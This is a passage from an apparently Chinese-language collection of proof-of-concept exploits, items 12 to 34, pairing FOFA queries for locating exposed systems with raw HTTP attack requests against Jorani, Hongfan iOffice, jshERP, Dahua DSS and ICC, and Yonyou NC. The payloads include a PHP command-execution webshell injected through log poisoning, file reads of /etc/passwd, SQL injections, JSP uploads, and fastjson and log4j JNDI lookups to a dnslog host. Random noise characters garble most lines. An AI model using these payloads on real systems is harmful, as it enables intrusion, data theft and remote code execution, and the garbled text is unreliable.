6 V; {7 B& F& R. rHost: 127.0.0.10 o! ~) ^# ^# G/ }! k! ], V
Pragma: no-cache
9 A# Z# T4 m& p2 K5 F1 sCache-Control: no-cache! n% P6 x% ?4 B5 L) p
Upgrade-Insecure-Requests: 1
* J! p8 L2 T: I3 s7 D5 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.368 d3 n9 d4 G: B& P7 g6 }% b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' p: p' m3 C" w( Y" p3 OAccept-Encoding: gzip, deflate
2 |+ o" Z: D2 I6 QAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 O, B7 }2 V3 \: SConnection: close
- q% I' B6 V3 I/ i( ? T0 n# Z+ D: M6 T1 `4 _5 W* o5 ]* e/ h
. Y* C, q" F* f: `. U/ ~6 D12. Jorani < 1.0.2 远程命令执行
9 v2 c. [7 I/ o4 X7 CFOFA:title="Jorani"+ _- s. z9 L/ _: [: V9 o
第一步先拿到cookie/ o, S/ w9 z* `
GET /session/login HTTP/1.11 N4 W, G. M0 u* }. C& Y& q
Host: 192.168.190.30# X" ]* j6 W' _6 [" [6 o1 ^3 R7 N6 s+ k
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36# C9 W# e+ r. [. F# ~
Connection: close) }2 v- ^- ` }" D8 A; [9 o
Accept-Encoding: gzip, f0 o u) q4 R# p, J% t' I: f
5 Q" z6 `+ m/ h0 Y( A& v8 x1 V
+ N; H7 }6 m& P; q) V e9 Z响应中csrf_cookie_jorani用于后续请求
' s* ~. L, P9 E' D# iHTTP/1.1 200 OK- ?" ?4 a! J2 c6 o0 [) Y0 b; [4 \
Connection: close3 E1 R- j9 x. U6 L( h0 t: }! ]
Cache-Control: no-store, no-cache, must-revalidate; @# Y0 w0 ^' u8 ~6 u* k/ M
Content-Type: text/html; charset=UTF-8
7 v5 P3 u: B# |. zDate: Tue, 24 Oct 2023 09:34:28 GMT. ?$ y8 B, \1 j' n# o6 S3 H
Expires: Thu, 19 Nov 1981 08:52:00 GMT0 K) M; [/ W0 @
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT, ^/ n* g6 _' e# |* y$ {2 i
Pragma: no-cache% c$ y+ g! R" e# h
Server: Apache/2.4.54 (Debian). }9 ?$ _$ _. w
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
& c0 D! [% v5 }- iSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly% V; x9 O" m7 s1 M* ~* Y
Vary: Accept-Encoding; v7 H) r& O- s/ f8 L, S2 B
1 W6 B$ c: |! N7 R1 j6 }
7 i: g% n$ I5 h" QPOST请求,执行函数并进行base64编码
$ I; u2 e6 T* nPOST /session/login HTTP/1.1 u! H+ C0 d8 {. d0 ~8 Q* K
Host: 192.168.190.30' u k( d% P( T& V) ~3 n" }4 u. M+ |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.363 a9 g! I# `3 c. ]3 o' }9 `, l! n
Connection: close o4 K) K7 z" v9 x3 I
Content-Length: 252$ \5 F( }0 A7 n$ A# s
Content-Type: application/x-www-form-urlencoded, d8 ]2 i6 f5 ~1 F8 O; x
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
) O& t% f6 z( C9 ~: C, L2 kAccept-Encoding: gzip
; J+ h/ N8 h- b- k. c. A
& z5 t, Q# W4 Y( Acsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor: t3 x1 R" O" C3 v, @
, A. `- [3 C7 }1 k1 P
" a+ _. t5 ^$ b% k' s& A4 B+ T0 r Z/ c: B! E+ W" ~! j" M5 M
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串4 o _! V5 T9 O! z
GET /pages/view/log-2023-10-24 HTTP/1.1
9 i# O/ z. W& f- c& iHost: 192.168.190.30
* W& @8 ?! n2 @7 V0 S5 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
) T2 k* [# ?% K8 p) }Connection: close& r' W B8 L7 l
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r3 {8 R" J' U" N, u! z
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
) d/ d1 l' p1 N, V: _X-REQUESTED-WITH: XMLHttpRequest, C2 v2 [ @# ]' Y
Accept-Encoding: gzip
! T& ?. Z+ t! {9 N, K1 H5 Q3 U$ X4 g1 c# n5 a% f7 m$ D
. x+ X' I% W7 l, \# P- X% A/ b13. 红帆iOffice ioFileDown任意文件读取
. d* @& S$ i/ X" X$ G! t* d0 z% AFOFA:app="红帆-ioffice"; v7 j) x* `) D5 C Q$ _* [
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.18 @* i8 M/ M. I/ @6 G
Host: x.x.x.x* X# E/ b* {' F& V( v1 A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
9 ^3 S# J k0 |$ I% y1 H- ?7 \1 zConnection: close
: m! {/ f+ f3 @* m! t5 S, y H) mAccept: */*& Q7 R: ^5 k" Q% i+ g% M- K
Accept-Encoding: gzip; ^! v, y" U- I
7 M( Y8 K2 i# S3 U+ f. K
! B* h" V; P" c. D7 z4 |! O14. 华夏ERP(jshERP)敏感信息泄露
$ v; |* W6 v+ I$ l2 C& K3 O, qFOFA:body="jshERP-boot"
. E% a \9 ^9 g泄露内容包括用户名密码
- X0 E0 N" z4 N2 p$ eGET /jshERP-boot/user/getAllList;.ico HTTP/1.1* w) j: |4 Q) T- D
Host: x.x.x.x' p/ b9 u& L+ @1 G* O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
" p; @+ _7 B' g/ a. ]3 j. Y9 tConnection: close6 e, \" j$ J# v3 ?2 j# P: t
Accept: */*% Z3 d. q. w4 o& x/ g* C& a( a0 w
Accept-Language: en- M- o4 ]- f1 M) e) h G& J
Accept-Encoding: gzip' f5 F- E4 m8 L ]3 E0 G
5 c% G0 }6 b+ n4 C7 R! J
/ X; ]. U' v% J4 ?/ b7 t& s! n/ u4 C15. 华夏ERP getAllList信息泄露
. @. b, U* t8 s# A. ^0 i) tCVE-2024-0490$ L. Y# N- C+ ^
FOFA:body="jshERP-boot"
" b. Y- j- ^$ ?$ E泄露内容包括用户名密码
' H* ?% L7 W: {/ B6 Q% w- AGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" }" `% d/ m- H) i( E% q% Z
Host: 192.168.40.130:1004 Y) G, ~) z+ s9 x, @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
+ Y4 V9 p3 ?+ C, H2 @; q+ `; GConnection: close4 k3 R% q1 c6 H* z; l" b! s( o0 R$ `
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.86 Z& k# \; I. P: h, G) S
Accept-Language: en
" D+ O! Y6 |8 Y) b2 p$ M& ysec-ch-ua-platform: Windows/ H9 g/ F1 l: U: R5 _0 |
Accept-Encoding: gzip
) S1 E6 |) f& C( }; U. i/ v7 p; d- l |& i% S: N7 }3 K7 k
( I# U1 I0 o5 }- z16. 红帆HFOffice医微云SQL注入 J) J& J: k9 ?5 r( s# J3 D q
FOFA:title="HFOffice"( `; ]1 b2 Z- Y, D% ?, e
poc中调用函数计算1234的md5值) H0 y& t% I( {; U4 S# K
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
0 w0 \! A x* |: g) E+ w6 V/ zHost: x.x.x.x$ |5 s* Q0 W" \7 h5 C) X
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36$ c8 W& ]2 J- G) o% z2 b" |2 f
Connection: close; B& c* R# _8 ]" y- {
Accept: */*
1 {% z+ n1 P8 a6 p0 g2 c# N9 b) kAccept-Language: en
1 g( _/ z( B; O: [. a0 t( w* ZAccept-Encoding: gzip
; V! P) I% p1 \
) v* R( j3 [2 B. R4 @
/ I& s7 X8 ?$ f0 q17. 大华 DSS itcBulletin SQL 注入5 r( F8 ?3 N( o Q2 W8 o
FOFA:app="dahua-DSS"
6 Y! e: y5 [0 w3 WPOST /portal/services/itcBulletin?wsdl HTTP/1.14 \4 c; q' z1 m5 J" a6 z
Host: x.x.x.x- ]" e: ~- ]: g; r1 w9 e" H* z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% B- N9 M6 ?5 n
Connection: close
$ ]6 u% c/ `5 f: }+ YContent-Length: 345- T1 W6 f; [! N, t% @3 X/ p
Accept-Encoding: gzip/ ^7 `; h% k4 q0 ~/ E! f9 R
% ] `- y9 {5 T' n<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
2 M* {6 q) G" b2 N$ ]. y<s11:Body>8 u( Z/ G* J, k8 t1 m
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
! U- s) E8 h# F! h <netMarkings>
# Z, {! K. G0 q3 d* O (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
# R1 j4 e7 q( r q% p y1 e </netMarkings>
, R# n2 Q& `1 c( L4 ]/ p </ns1:deleteBulletin>
3 d4 k& F" i) C </s11:Body>
8 T2 w* R! d% Y</s11:Envelope>$ `: u) c, [7 ^7 P2 y
; ]4 P; O6 U) K3 c% n/ d/ X
7 I; e# }" c! f8 E/ ]3 B7 N18. 大华 DSS 数字监控系统 user_edit.action 信息泄露# _/ o$ r* ~0 b4 ~( H$ B/ ^
FOFA:app="dahua-DSS"
: W5 g. J: y. ]; l0 lGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1. Q8 z: ]" _0 V. t
Host: your-ip0 q: _ o* T6 @9 ~* Y- w1 c. F; {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 N; }1 x' ?5 J5 ~/ d6 h
Accept-Encoding: gzip, deflate
0 J3 }- k+ Z* r0 F" m* U" T% XAccept: */*
) S/ Q( i8 ]. S; \Connection: keep-alive4 r: N2 B+ A% i( H8 y" q
+ K" o1 a; m; i- H: W4 e2 _
" i; G1 I) Z9 V; x- U. D/ T. v3 t" {
: E! {7 D' B# q" e' K19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入9 `1 p; y' E0 y; u& \6 S$ G" X' R
FOFA:app="dahua-DSS"
4 B4 Y% O' Y. W9 ~' k8 Z2 m6 G. q5 eGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
8 a( M! k/ |8 i' EHost:& l, N. h! u& M: g: `3 C
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36: y: V! j3 b6 \. [' e0 f. @
Accept-Encoding: gzip, deflate
* \* `5 n9 [4 D0 l6 O8 c+ X2 DAccept: */*0 n; Q* Y, y+ d; T1 s
Connection: keep-alive2 W. Q7 `7 ` h+ k7 C2 G
& s3 _& ^8 t& v4 J; o' W+ b- f- C1 W# N& E) `
20. 大华ICC智能物联综合管理平台任意文件读取4 g8 l8 k1 ^+ Q3 e( o4 d
FOFA:body="*客户端会小于800*"* S' ]6 W; p5 B! x% s. t$ Y# O
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
$ z4 h& q# r! {2 C# r9 G6 [, Y0 n" RHost: x.x.x.x6 U4 ?- W8 A4 x; x4 M! B
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 Z* u: h) ~8 @! i
Connection: close' a8 z5 v7 b, \* E. h% }
Accept: */*. x8 P V3 R, U& G# t n
Accept-Language: en
$ |6 l" B! O6 p5 v2 a/ @Accept-Encoding: gzip
% K8 @9 x9 k. h6 k) ~/ R r# {; E3 E' K# I5 y: ~" d
% V- [6 P8 ~' Q) d( Z
21. 大华ICC智能物联综合管理平台random远程代码执行( F! K* |2 k1 Q. v. s. E/ H8 j0 ]
FOFA:icon_hash="-1935899595"
2 T) `, r: Z: j ~7 j5 x5 {POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
[: w/ r( }" s& W. h& U/ |Host: x.x.x.x, N Z4 ?( R8 w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) D$ I1 p) w2 w- I6 b" c+ R3 g" H# V9 BContent-Length: 161+ W$ z+ S2 |4 s6 ?) u1 W/ z
Accept-Encoding: gzip1 B9 j+ X% l$ B8 B, K
Connection: close
6 P0 L' o$ J' l2 D m) BContent-Type: application/json;charset=utf-8+ H! D3 S5 {! \2 @6 P3 h
3 L S4 ~; t8 e6 |( r% P0 |
{1 M* G3 O$ Q% B7 a7 A' `
"a":{
7 m) X5 A5 h4 s2 ?( j- J, f "@type":"com.alibaba.fastjson.JSONObject",
- o( g% z3 j! ~, m! p" i {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
- R; m+ n' H4 G% J' \. V7 l }""
4 C* j0 |7 z% l8 M* \}
! w5 v7 k2 x$ T8 X, h
6 x& S5 z- V' G# ]3 e! {6 `% i7 F+ {. g$ x9 J
22. 大华ICC智能物联综合管理平台 log4j远程代码执行6 j) M4 z0 {& } s) k
FOFA:icon_hash="-1935899595"
8 _$ \! |" }. wPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.12 l+ o! y# C8 V5 k4 n/ x. Q
Host: your-ip- k/ `. }# c7 A0 W; g* G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, |% e. I+ ~) b) e# k$ V0 ?4 d" C
Content-Type: application/json;charset=utf-85 z! m' b& Q1 z. V6 J6 w. j
" q8 l4 u6 B0 w: N, v
{% F* Z/ Z: `, l, W
"loginName":"${jndi:ldap://dnslog}" N, N0 u2 |/ h7 ]7 K u2 u! a
}
. U8 @) A) u; p8 N$ w" l
& c# A% F$ D' O: a
+ l: |' H7 `$ M* q
: A% ^& {$ Y7 P* o( R# P6 J23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
% _( J- p K3 Y) A& e% F) r' ]$ aFOFA:icon_hash="-1935899595"
: a, [- R6 ~; B- u2 JPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
# P' a" B/ i- `1 @Host: your-ip8 n9 e& R& A4 E+ |) f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: \3 W6 M! Z$ k' l. o7 v
Content-Type: application/json;charset=utf-8
' e/ V: @- h) LAccept-Encoding: gzip" y% d: u4 r% ?9 f* A# h8 k
Connection: close# i0 Q6 E/ M" E
; e0 W) d8 D& [' a+ N
{+ Y7 V+ m9 Y7 S
"a":{; g) A, f! i) w- Y, E) u- F
"@type":"com.alibaba.fastjson.JSONObject",
- @7 m5 I4 b a& j+ ` {"@type":"java.net.URL","val":"http://DNSLOG"}
" l3 a d3 ]/ {) D% m8 D# V; v+ Y* w }""/ T6 }; @- a: U& ^
}% c* r+ \4 K% e8 v* ]
, L& r. y' B5 E6 v% z0 x u0 x3 }& a/ Z/ K+ ~: W3 \- h
24. 用友NC 6.5 accept.jsp任意文件上传
) y, L+ K0 P$ Z& V5 b, R7 dFOFA:icon_hash="1085941792"9 R5 O! |+ `- M& D# O; T, {
POST /aim/equipmap/accept.jsp HTTP/1.1$ u, G- }7 j+ [! _4 N2 t
Host: x.x.x.x
4 y. l% a% v d- Y# PUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
* U* d6 i* C- g& Z6 [Connection: close
. r% ~/ U# d! OContent-Length: 449
$ q4 f2 s7 n. h2 l' O" j9 U& _. NAccept: */* [- L! ~( S1 f- I& ~% i' j
Accept-Encoding: gzip$ }" q2 l- ~: o
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
: n( j R3 `9 d# p) {9 S
3 u4 y5 @6 ]7 F0 W6 f0 w b( y-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc2 W9 B! g' D" J8 O' @8 w
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt". I; V8 y+ ?5 o ]5 M$ \& v/ g, t
Content-Type: text/plain
5 N9 `: h0 U) v; P1 i1 Q- i/ B/ d5 Q4 T
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>. B) a" t, u; M) M
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc' s C, I. s* S" N) i. X: @- \
Content-Disposition: form-data; name="fname"0 a# f, Q7 f3 W" ?4 `" E! a
3 B5 H4 v* e q6 }; ]\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp$ B8 m L \3 V/ v2 ?9 i
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--. w# O6 B4 L7 a. m( N' k
& @! \; [6 {: Y. |1 u
# N4 G4 t; H/ b# k2 Q25. 用友NC registerServlet JNDI 远程代码执行6 E D! d2 D d# W# m1 S
FOFA:app="用友-UFIDA-NC"
. l: g, ?8 |/ u+ F) xPOST /portal/registerServlet HTTP/1.1
' r' P9 q/ @) p3 t. S, J1 T; LHost: your-ip. k& e* q T, x+ q; ^" n: D, N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0% k" O' E' h$ b0 _: P3 N# \$ t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
: k) I# y8 l( @7 a sAccept-Encoding: gzip, deflate
1 d, `3 I( a6 m4 X$ j: |/ O- r! GAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
# l" O( N4 r) h, i$ ^2 LContent-Type: application/x-www-form-urlencoded
2 w2 U% v% ?$ _% |! m' o
6 R& n' {1 H' Otype=1&dsname=ldap://dnslog) o, _& V6 e7 d- @1 N: V8 m
( M3 A+ R4 h4 S; n& ]7 {1 s) j
9 s5 [8 k j, h1 Q* D5 g" u) |4 e& V( H9 L( Q, {: V' {) Z
26. 用友NC linkVoucher SQL注入6 N ?4 G8 v; w0 X3 f% ]
FOFA:app="用友-UFIDA-NC"9 F- _6 z8 Z7 J( \' V
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 G$ B: u+ U* e$ ^4 m! ZHost: your-ip
6 J* D4 ~( c+ J. X3 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" p! v; G. [4 d! y
Content-Type: application/x-www-form-urlencoded O9 M( }; S: G. |. J, G5 m
Accept-Encoding: gzip, deflate, x0 C! |$ w' M
Accept: */*
2 k' Q' h& A1 E9 ZConnection: keep-alive5 Z2 ]' b: H+ `+ j3 r. s
: n) W& p# d' o, x
! ^5 b7 B0 j5 Q( H M( j
27. 用友 NC showcontent SQL注入
( i. }0 W4 E" W- F. [FOFA:icon_hash="1085941792"
5 |; k" ]5 s% m4 ~GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
}* D4 w- n& E, v" X$ MHost: your-ip
% s1 Y! y( o0 M! o- Q. l0 g6 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( O& ~6 ?5 f" o8 v" z4 L
Accept-Encoding: identity/ U8 Q; y/ W, p/ h
Connection: close- V' y5 Z; x6 y) Q" ]7 N Y
Content-Type: text/xml; charset=utf-8$ N5 N. \$ k+ f4 y# K' o
4 o( W: P0 U1 b1 _8 O% A
9 S1 i8 X; D0 P9 g) s9 P, D8 W/ E28. 用友NC grouptemplet 任意文件上传5 z; {9 F; ?8 d: I
FOFA:icon_hash="1085941792"! W- Z* w" S( u8 e
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1/ j6 M. @6 j2 L$ d! H% \
Host: x.x.x.x+ b, I$ s, R" m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36/ J% i+ b: Q' [+ z
Connection: close! ~& `& p! Q9 h( e: d
Content-Length: 268/ g- S- ]; J0 s* {9 T j
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk: M3 y1 i& \" T
Accept-Encoding: gzip* j' E% } Z) f. M8 S" G) y, J6 p: f
9 ]% \* d4 }) Y4 I5 g
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk" ?7 E) B! H6 a
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"& V- t* f" f5 s* v' S; M
Content-Type: application/octet-stream
2 f9 Y6 f0 s9 K5 j/ x6 h3 h q2 o- G( o/ B0 o/ Q. W U2 V* A% J
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>" u; W' I& A$ B+ K' w7 W
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--8 N5 _) }! {1 {3 g6 o
4 `3 q ^3 Q6 U6 t% ~+ K
: G: e1 {) T9 S' r8 {) h/uapim/static/pages/nc/head.jsp
9 t2 q4 F9 V7 {" f- a) J, D( \: }: i1 [
& N, m: b0 L; h29. 用友NC down/bill SQL注入8 c- I) l2 P) ]- X: n) N
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
1 v, h; S: Y/ X$ ~% QGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1' w& \8 ?0 Y: Q: `( h' ~- t
Host: your-ip
" l; \* o) v+ h8 L7 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* o/ ~* x' E: A5 ]0 \# b% C
Content-Type: application/x-www-form-urlencoded2 h; }" }- Y) x/ ~: ~8 t* d7 n
Accept-Encoding: gzip, deflate
1 G; S& P% b$ Y- V4 |2 K {Accept: */*
" ~! ]5 n% v% P% ?- d! q+ }Connection: keep-alive# Q9 ?5 e; p D9 x7 \" V9 E; q- l
, ]8 U( q+ R7 k0 X3 h6 f8 x. M* U
0 K1 f- s. Y9 [6 ^$ w+ e0 m: k
30. 用友NC importPml SQL注入& r; w" F7 B* C# a! C7 u v! V
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"0 g$ k- w" O" s- ~3 P# O0 }, r# L; @
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
c; K, k$ m6 k0 Q% YHost: your-ip
; I6 K- x! I& _( y: z' `Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V; U( L4 I# X4 n) h/ U' f2 p/ q7 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36: W4 m$ N* G; [" n" T4 B
Connection: close# J+ \! E+ M6 Y5 a
3 C+ {2 U. T7 C% i+ i, e* }
------WebKitFormBoundaryH970hbttBhoCyj9V* Y4 H- c! q B( e5 o; L
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"% K5 H+ `3 ?% p+ Q9 [3 ? Z% D. m) q
Content-Type: image/jpeg
6 _2 {% Q1 Z. U------WebKitFormBoundaryH970hbttBhoCyj9V-- K1 i# M9 |+ O# Z" s
/ z1 U# b6 _+ D }+ i/ n2 C
* s, N B: Y3 D! E7 l4 \31. 用友NC runStateServlet SQL注入5 h4 X: e% l+ R! T
version<=6.5& T; [7 Y6 e+ w. Z2 [# E: D
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"* L& Q- ]0 x; p8 @9 O, K0 T
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.18 h! R$ n+ }5 z# n! B
Host: host
: ^3 B/ ]0 B6 M% c* vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
4 ^0 p8 w8 {3 h$ I; G0 e+ p3 E6 IContent-Type: application/x-www-form-urlencoded/ y- B/ V. g& `5 V, K3 ^! {
3 N! b% q: `, c2 r \ x$ d' ^
% U* O$ R+ ]4 j. h" _ L32. 用友NC complainbilldetail SQL注入% Z/ `4 i; j$ i5 J
version= NC633、NC65* c4 \8 e* k) R+ v
FOFA:app="用友-UFIDA-NC"
0 D& I3 d& H3 r5 CGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.10 F5 Z0 g: ]4 n& Y! Y+ H: @
Host: your-ip$ h% b8 y j+ ^2 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 j0 B+ x, u, n- o5 A
Content-Type: application/x-www-form-urlencoded
7 E/ h, w" A9 e& C8 W! p$ B# HAccept-Encoding: gzip, deflate
8 ^: n4 q- c7 h4 dAccept: */* V X% O3 t0 m( H
Connection: keep-alive% h! x2 i2 q J, s& e1 U6 o
6 K* J+ o& D7 ]0 h {' _& H1 h
6 F/ v; ?, l6 a- D8 h
33. 用友NC downTax/download SQL注入
+ f+ ?; e/ l0 q+ t5 U v2 y4 @version:NC6.5FOFA:app="用友-UFIDA-NC"
/ T9 Y0 H/ o( R' B( j" j4 wGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
" _( Z$ f- ~" m& \6 Z: l! qHost: your-ip6 S( h1 ?. Q, u( b) m5 B4 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; e4 R3 G( D; i9 |
Content-Type: application/x-www-form-urlencoded+ y) ^' |( g8 u1 L
Accept-Encoding: gzip, deflate4 H& |; [0 e( x3 G. [
Accept: */*, ~" J! w0 X2 M2 Q
Connection: keep-alive
" ?( o0 I' | b6 [& g+ { L/ t. V T& v: O/ n0 c/ w9 x
# g, q) p3 E7 y3 H34. 用友NC warningDetailInfo接口SQL注入
# N! f; l; R, ~/ U% z$ a! V: W- PFOFA:app="用友-UFIDA-NC"
0 u* @# E. e4 C/ Y8 eGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.10 Z5 { I% E% T; h+ S
Host: your-ip! W: j0 I" X+ ~( _) Q1 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 `3 L1 b n! ?Content-Type: application/x-www-form-urlencoded0 ^- t7 l8 G: c& J. i
Accept-Encoding: gzip, deflate
- }$ ^6 J& z* `$ WAccept: */*1 I/ j1 z ~* g: I& m
Connection: keep-alive7 o1 C4 C |; b5 p" j
